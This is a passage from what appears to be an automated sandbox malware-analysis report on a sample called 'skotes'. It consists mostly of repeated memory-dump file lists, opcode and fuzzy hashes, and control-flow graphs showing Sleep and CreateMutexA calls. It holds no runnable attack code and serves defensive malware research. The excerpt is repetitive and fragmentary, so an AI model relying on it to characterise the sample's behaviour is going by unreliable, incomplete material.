                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748997514.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749045528.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749088386.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749122409.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749144178.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749163814.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: a63569219ecf72937b8afdb6f268dfbbcdc68acfb7619266e1432f4094623d1e
                                                                                                                                                                                                                                                              • Instruction ID: f3b6ce5094962130046914b1cd5c54c908e7c5adf3543f4f5b5f65b88152ff3c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a63569219ecf72937b8afdb6f268dfbbcdc68acfb7619266e1432f4094623d1e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A310B3160430097EB08ABBCD8897ADB7A5DBCB314F285629E014FF3D5D7B56981C652

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 164 eaa54d-eaa56d 168 eaa59b-eaa5b7 164->168 169 eaa56f-eaa57b 164->169 170 eaa5b9-eaa5c5 168->170 171 eaa5e5-eaa604 168->171 172 eaa57d-eaa58b 169->172 173 eaa591-eaa598 call ebd663 169->173 175 eaa5db-eaa5e2 call ebd663 170->175 176 eaa5c7-eaa5d5 170->176 177 eaa632-eaa916 call eb80c0 171->177 178 eaa606-eaa612 171->178 172->173 179 eaa944-eaa949 call ed6c6a 172->179 173->168 175->171 176->175 176->179 182 eaa628-eaa62f call ebd663 178->182 183 eaa614-eaa622 178->183 190 eaa94e 179->190 191 eaa949 call ed6c6a 179->191 182->177 183->179 183->182 195 eaa953-eaa994 Sleep CreateMutexA 190->195 196 eaa94e call ed6c6a 190->196 191->190 198 eaa996-eaa998 195->198 199 eaa9a7-eaa9a8 195->199 196->195 198->199 200 eaa99a-eaa9a5 198->200 200->199
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00EAA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00F03254), ref: 00EAA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1747399755.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747368388.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747399755.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747494405.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747526417.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747556586.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747584320.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747611318.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747782150.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747808925.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747844806.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747872445.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747955076.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747983085.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748012236.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748041127.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748072207.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748100281.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748129827.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748162195.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748203595.00000000010C6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748235102.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748263519.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748291851.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748323826.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748353642.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748381998.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748410518.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748438094.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748469298.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748496878.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748524293.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748551601.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748579015.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748601479.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748620342.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748638394.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748656500.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748673938.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748693881.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748715245.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748733390.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748752057.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748770761.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748793044.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748811807.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748829820.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748847354.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748872575.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748947527.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748997514.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749045528.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749088386.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749122409.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749144178.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749163814.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: d9242de8ce329093c8bd3a71a951bcbfb9cf7067589b863213ffddfb25f008de
                                                                                                                                                                                                                                                              • Instruction ID: 84a65373c15b16e7664f502110547ffaa4593dd38d50cb7685cb5a15981a1781
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9242de8ce329093c8bd3a71a951bcbfb9cf7067589b863213ffddfb25f008de
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0310C31A042048BEB18DF78DC857ADB7A6EBCB314F285629E014FF3D5C775A981C616

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 202 eaa682-eaa6a2 206 eaa6d0-eaa6ec 202->206 207 eaa6a4-eaa6b0 202->207 210 eaa71a-eaa739 206->210 211 eaa6ee-eaa6fa 206->211 208 eaa6b2-eaa6c0 207->208 209 eaa6c6-eaa6cd call ebd663 207->209 208->209 212 eaa949 208->212 209->206 216 eaa73b-eaa747 210->216 217 eaa767-eaa916 call eb80c0 210->217 214 eaa6fc-eaa70a 211->214 215 eaa710-eaa717 call ebd663 211->215 218 eaa94e 212->218 219 eaa949 call ed6c6a 212->219 214->212 214->215 215->210 223 eaa749-eaa757 216->223 224 eaa75d-eaa764 call ebd663 216->224 226 eaa953-eaa994 Sleep CreateMutexA 218->226 227 eaa94e call ed6c6a 218->227 219->218 223->212 223->224 224->217 234 eaa996-eaa998 226->234 235 eaa9a7-eaa9a8 226->235 227->226 234->235 236 eaa99a-eaa9a5 234->236 236->235
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00EAA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00F03254), ref: 00EAA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1747399755.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747368388.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747399755.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747494405.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747526417.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747556586.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747584320.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747611318.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747782150.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747808925.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747844806.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747872445.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747955076.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747983085.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748012236.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748041127.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748072207.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748100281.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748129827.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748162195.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748203595.00000000010C6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748235102.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748263519.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748291851.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748323826.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748353642.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748381998.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748410518.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748438094.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748469298.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748496878.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748524293.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748551601.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748579015.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748601479.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748620342.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748638394.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748656500.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748673938.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748693881.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748715245.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748733390.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748752057.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748770761.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748793044.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748811807.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748829820.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748847354.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748872575.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748947527.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748997514.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749045528.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749088386.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749122409.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749144178.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749163814.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: a4f86cddcffba284be0dd1be9efdc7b4393e888d7fe6fb6e2040e7e506b06fe2
                                                                                                                                                                                                                                                              • Instruction ID: 621769384714e949554b286ab1a41115ae7f541d1f216fdea18b9056f8a040dc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4f86cddcffba284be0dd1be9efdc7b4393e888d7fe6fb6e2040e7e506b06fe2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 913129316043048BEB18AF78DC857AEB7A2DBCB314F289629E014FF2D5C7756981C652

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 238 ea9adc-ea9ae8 239 ea9aea-ea9af8 238->239 240 ea9afe-ea9d91 call ebd663 call eb7a00 call ea5c10 call ea8b30 call eb8220 call eb7a00 call ea5c10 call ea8b30 call eb8220 238->240 239->240 241 eaa917 239->241 243 eaa953-eaa994 Sleep CreateMutexA 241->243 244 eaa917 call ed6c6a 241->244 249 eaa996-eaa998 243->249 250 eaa9a7-eaa9a8 243->250 244->243 249->250 252 eaa99a-eaa9a5 249->252 252->250
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00EAA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00F03254), ref: 00EAA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1747399755.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747368388.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747399755.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747494405.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747526417.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747556586.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747584320.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747611318.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747782150.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747808925.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747844806.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747872445.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747955076.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747983085.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748012236.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748041127.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748072207.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748100281.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748129827.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748162195.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748203595.00000000010C6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748235102.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748263519.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748291851.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748323826.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748353642.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748381998.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748410518.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748438094.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748469298.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748496878.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748524293.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748551601.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748579015.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748601479.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748620342.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748638394.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748656500.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748673938.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748693881.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748715245.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748733390.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748752057.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748770761.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
